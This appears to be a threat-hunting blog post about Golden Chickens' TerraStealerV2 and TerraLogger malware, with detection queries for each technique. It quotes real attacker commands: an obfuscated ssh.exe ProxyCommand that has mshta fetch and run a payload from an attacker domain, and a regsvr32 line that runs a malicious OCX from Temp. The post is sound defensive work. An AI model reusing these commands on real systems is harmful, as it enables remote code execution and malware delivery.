123. Hunting for Golden Chickens' New Malware
Hello everyone!
Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger. Both were attributed to the threat actor known as Golden Chickens. The adversary provides tools to other criminals operating a Malware-as-a-Service (MaaS) platform.
I've looked through the report, and (as always) caught a few detection and hunting opportunities.
For example, the adversary abused ssh.exe for proxying PowerShell execution:
ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"
We can hunt for similar activity using the following query:
event_type: "processcreatewin"
AND
proc_file_name: "ssh.exe"
AND
cmdline: "proxycommand"
Next thing, abusing regsvr32.exe for executing a malicious OCX file:
regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx
We can use the following query to hunt for OCX files executions from Temp folders:
event_type: "processcreatewin"
AND
proc_file_name: "regsvr32.exe"
AND
cmdline: "temp" AND "ocx"
One more thing, the stealer uses ifconfig[.]me to collect information about the compromised system's IP address, we can also use it for hunting:
event_type: "dnsreq"
AND
dns_rname: "ifconfig.me"
Make sure you've checked the report - it's full of detection ideas!
See you tomorrow!
Comments
Post a Comment